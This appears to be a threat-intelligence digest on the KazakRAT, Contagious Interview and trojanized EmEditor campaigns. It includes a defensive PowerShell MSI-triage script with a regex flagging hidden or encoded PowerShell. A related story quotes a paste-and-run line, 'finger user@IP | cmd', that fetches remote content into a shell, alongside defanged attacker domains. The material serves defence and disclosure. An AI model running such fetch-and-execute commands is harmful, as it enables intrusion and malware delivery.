State-Linked Malware Campaigns Using Social Engineering and Trojanized Installers
Multiple reports detailed state-linked intrusion activity relying on social engineering and trusted delivery mechanisms to gain initial access and establish remote control. Researchers reported a suspected state-affiliated espionage operation targeting government and financial organizations in Kazakhstan and Afghanistan, built around a previously unreported Windows DLL implant dubbed KazakRAT delivered via malicious MSI installers and decoy documents (e.g., a fake Kazakh presidential letter and an Afghan provincial memo). The malware was described as relatively unsophisticated—unencrypted HTTP beaconing and minimal obfuscation—yet capable of host reconnaissance, file search/exfiltration, and downloading/executing additional payloads, enabling long-running access since at least 2022.
Separately, Insikt Group described North Korean operators (tracked as PurpleBravo) running the “Contagious Interview” campaign, using fake recruiter personas and weaponized “coding tests” hosted on platforms like GitHub to trick software developers into executing malware on corporate devices, supporting software supply-chain targeting. The toolset reportedly includes BeaverTail (a JavaScript infostealer) and the newly identified RATs PylangGhost and GolangGhost. In another supply-chain-style incident, Trend research and an Emurasoft advisory reported the official EmEditor download being tampered with to serve a trojanized MSI whose CustomAction launched PowerShell to fetch staged payloads from lookalike domains (e.g., EmEditorjp[.]com, EmEditorgb[.]com, EmEditorde[.]com), followed by environment fingerprinting and geofencing checks—highlighting ongoing risk from compromised public software distribution channels.
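As an added defensive check, not part of the original reporting or of Emurasoft's advisory, the following PowerShell script inspects a downloaded MSI before it is run: it verifies the Authenticode signature, optionally compares the file hash against a vendor-published value, and lists CustomAction rows whose type launches an executable or script and whose command line invokes PowerShell, the pattern described above. It assumes Windows (the Windows Installer COM object), and `$MsiPath` and `$ExpectedSha256` are placeholders supplied by the analyst.

```powershell
# Added example: triage a downloaded MSI before executing it.
# Assumptions: -MsiPath points at the installer under review; -ExpectedSha256 is the
# hash the vendor publishes (placeholder, not taken from any advisory).
param(
    [Parameter(Mandatory)] [string] $MsiPath,
    [string] $ExpectedSha256
)

# 1. Authenticode: a tampered installer is typically unsigned or signed by an unexpected publisher.
$sig = Get-AuthenticodeSignature -FilePath $MsiPath
"Signature status : $($sig.Status)"
"Signer           : $($sig.SignerCertificate.Subject)"

# 2. Hash comparison against the vendor-published value, when one is supplied.
if ($ExpectedSha256) {
    $actual = (Get-FileHash -Path $MsiPath -Algorithm SHA256).Hash
    "SHA-256 match    : $($actual -eq $ExpectedSha256.ToUpper())"
}

# 3. CustomAction table: the low type bits (0x07) give the action kind
#    (2 = EXE, 5 = JScript, 6 = VBScript); Source/Target carry the command line.
$installer = New-Object -ComObject WindowsInstaller.Installer
$db   = $installer.GetType().InvokeMember('OpenDatabase', 'InvokeMethod', $null, $installer, @($MsiPath, 0))
$view = $db.GetType().InvokeMember('OpenView', 'InvokeMethod', $null, $db,
            @('SELECT `Action`, `Type`, `Source`, `Target` FROM `CustomAction`'))
$view.GetType().InvokeMember('Execute', 'InvokeMethod', $null, $view, $null)

$suspicious = @()
while ($true) {
    $rec = $view.GetType().InvokeMember('Fetch', 'InvokeMethod', $null, $view, $null)
    if ($null -eq $rec) { break }
    $row  = 1..4 | ForEach-Object { $rec.GetType().InvokeMember('StringData', 'GetProperty', $null, $rec, $_) }
    $type = [int]$row[1]
    $kind = $type -band 0x07
    $cmd  = "$($row[2]) $($row[3])"
    # Flag EXE/script actions whose command line invokes PowerShell or uses hidden/bypass switches.
    if (($kind -in @(2, 5, 6)) -and ($cmd -match 'powershell|pwsh|-enc|-w(indowstyle)?\s+hidden|bypass')) {
        $suspicious += [pscustomobject]@{
            Action       = $row[0]
            Type         = $type
            RunsAsSystem = [bool]($type -band 0x2000)   # msidbCustomActionTypeNoImpersonate
            CommandLine  = $cmd
        }
    }
}
if ($suspicious.Count -eq 0) { "No CustomAction invokes PowerShell." }
else { $suspicious | Format-Table -AutoSize }
```

A legitimate installer can carry PowerShell CustomActions too, so treat a hit as a reason to compare against a known-good copy of the same version rather than as proof of tampering.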
Timeline
Jan 27, 2026
Researchers publicly disclose KazakRAT campaign and APT36 overlap
Researchers revealed the long-running KazakRAT espionage operation and noted overlaps with APT36/Transparent Tribe, including use of XploitSpy in related activity. While attribution remained unconfirmed, the disclosure established links in victimology and tooling patterns.
Jan 27, 2026
Researchers publicly disclose EmEditor supply-chain compromise
TrendAI Research reported the EmEditor supply-chain attack, detailing how the official installer was hijacked to distribute malware through attacker-controlled domains. The disclosure highlighted the risk to organizations downloading the software from the compromised official source.
Jan 27, 2026
Researchers publicly disclose Contagious Interview and PurpleBravo details
Insikt Group published findings on the North Korea-linked Contagious Interview campaign, linking PurpleBravo to large-scale targeting of more than 3,000 IPs and at least 20 victim organizations in AI, cryptocurrency, and financial services. The report also noted operational overlap with PurpleDelta, a network of fraudulent North Korean IT workers.
Jan 27, 2026
Emurasoft issues emergency advisory on tampered EmEditor download link
Emurasoft acknowledged that the official EmEditor download link may have been tampered with and warned users to verify installer integrity. Organizations were urged to investigate possible compromise and look for traffic to the identified malicious domains.
Jan 27, 2026
Researchers sinkhole a KazakRAT command-and-control domain
Investigators took over a key KazakRAT C2 domain after the threat actor failed to renew it, allowing them to sinkhole traffic and passively collect victim IP addresses. The telemetry reinforced that the campaign was targeting government and financial-sector roles, especially in Kazakhstan's Karaganda region.
Jan 27, 2026
Attackers launch Contagious Interview fake-job malware campaign
A North Korea-linked threat cluster tracked as PurpleBravo began targeting IT and software supply-chain personnel through fake recruiter personas, interviews, and weaponized coding tests hosted on GitHub. The campaign used BeaverTail for initial compromise and later deployed the newly identified PylangGhost and GolangGhost RATs against victims using corporate devices.
Dec 1, 2025
EmEditor malware campaign adds credential theft and lateral movement preparation
Analysis of the trojanized EmEditor installer revealed a multi-stage payload chain that performed host fingerprinting, geofencing, credential theft, defense evasion, and preparation for lateral movement. Researchers assessed the operators were likely of Russian or broader CIS origin based on geofence exclusions and observed tradecraft.
Dec 1, 2025
Trojanized EmEditor installer campaign surfaces on official download page
In late December 2025, attackers hijacked EmEditor's official download flow and served a malicious MSI installer in place of the legitimate software. The trojanized package used a modified MSI CustomAction to launch PowerShell, retrieve first-stage code, and pull additional modules from attacker-controlled domains.
Aug 1, 2022
KazakRAT espionage campaign begins targeting Kazakhstan and Afghanistan
A suspected state-affiliated espionage campaign using the previously unreported KazakRAT malware was active by at least August 2022, targeting government and financial entities in Kazakhstan and Afghanistan. The operation used tailored decoy documents and malicious MSI installers to deliver a DLL-based Windows RAT.
Related Stories

Social-engineering malware campaigns delivering remote-access trojans and backdoors
Recent reporting highlights multiple **social-engineering-driven malware delivery** efforts that culminate in remote access and persistent compromise. In South Korea, attackers distributed **counterfeit adult games** via popular “webhard” file-sharing services; victims received a ZIP containing a decoy `Game.exe` launcher that stages additional components (`Data1.Pak`, `Data2.Pak`, `Data3.Pak`) and ultimately injects **QuasarRAT** (aka **xRAT**), enabling host profiling, keylogging, and unauthorized file transfer. The execution chain included masqueraded artifacts such as `GoogleUpdate.exe` and `WinUpdate.db`, with AES used to decrypt/extract shellcode prior to privilege escalation and RAT injection. Separately, a spear-phishing campaign weaponized news about a purported **Nicolás Maduro arrest** to deliver a **backdoor**: emails carried a ZIP with a lure executable (`Maduro to be taken to New York.exe`) alongside a malicious DLL (`kuguo.dll`) that abuses a legitimate KuGuo binary for execution. Post-run behavior included replication to `C:\ProgramData\Technology360NB`, persistence via an auto-start renamed binary (`DataTechnology.exe`), and C2 beaconing for tasking and configuration updates; researchers noted tradecraft consistent with **Mustang Panda** but said attribution was not yet confirmed. A separate research note described **GravityRAT** reemerging as a multi-platform RAT with expanded **Android** targeting (in addition to Windows/macOS), emphasizing mobile endpoints as increasingly high-value targets for data theft and persistent access, though it did not describe the same specific campaigns as the Windows-focused lures above.
Windows Malware Campaigns Using Social Engineering and Legitimate Platforms to Deliver RATs, Stealers, and Proxyware
Multiple research reports detailed **Windows-focused malware delivery chains** that rely on social engineering and abuse of legitimate services to blend into normal enterprise traffic. FortiGuard Labs described a **multi-stage campaign targeting users in Russia** that starts with business-themed decoy documents and scripts, then escalates to security-control bypass and surveillance before deploying **Amnesia RAT** and ultimately **ransomware** with widespread file encryption. A notable technique in that intrusion is the abuse of **Defendnot** (a Windows Security Center trust-model research tool) to **disable Microsoft Defender**, while payloads are hosted modularly across public cloud services (e.g., **GitHub** for scripts and **Dropbox** for binaries) to improve resilience and complicate takedowns. Separately, ReliaQuest reported attackers using **LinkedIn private messages** to build trust with targets and deliver a **WinRAR SFX** that triggers **DLL sideloading** via a legitimate PDF reader, then establishes persistence (Registry `Run` key) and executes **Base64-encoded shellcode in-memory** to load a RAT-like payload. Trend Micro and Koi Security documented **Evelyn Stealer**, which weaponizes **malicious VS Code extensions** to drop a downloader DLL (e.g., `Lightshot.dll`), run hidden PowerShell to fetch `runtime.exe`, and inject the stealer into `grpconv.exe`, exfiltrating data (credentials, cookies, wallets, screenshots, Wi‑Fi credentials) to `server09.mentality[.]cloud` over FTP. AhnLab ASEC also reported **proxyjacking** activity in South Korea attributed to **Larva‑25012**, distributing **proxyware disguised as a Notepad++ installer** and evolving evasion (e.g., injecting into Windows Explorer and using Python-based loaders) to monetize victims’ bandwidth via unauthorized proxyware installation.
Malware Delivery via Social Engineering: Phishing Lures, Fake Browser Alerts, and Paste-and-Run Payloads
Multiple threat reports describe **social-engineering-driven malware delivery** leading to remote access and follow-on payload deployment. Fortinet observed a **multi-stage phishing campaign targeting users in Russia** that delivers **Amnesia RAT** and ransomware via business-themed decoy documents and a malicious `.lnk` shortcut using a double extension (e.g., `*.txt.lnk`). The infection chain uses public cloud services for staging—**GitHub** for scripts and **Dropbox** for binary payloads—and abuses **defendnot** to trick Windows into believing a third-party AV is installed, effectively disabling **Microsoft Defender** before later-stage execution. Separately, Huntress attributed activity to **KongTuke**, which uses **malicious browser extensions** to display fake “browser crash” security alerts (“**CrashFix**”) that pressure users into running attacker-provided commands, and also deploys a Python RAT dubbed **ModeloRAT**. ModeloRAT is described as heavily obfuscated, using **Windows Registry** persistence and **RC4**-encrypted communications, with the ability to deliver additional payloads (DLLs, executables, scripts). Red Canary’s January intelligence update highlights **Scarlet Goldfinch** activity using **paste-and-run** lures and a notable technique of using the Windows `finger` client to pull remote content (e.g., `finger user@IP | cmd`), followed by `curl` download of an archive masquerading as a PDF and extraction via `tar -xf`, culminating in **Remcos** (and sometimes **NetSupport**) delivered via **DLL sideloading**.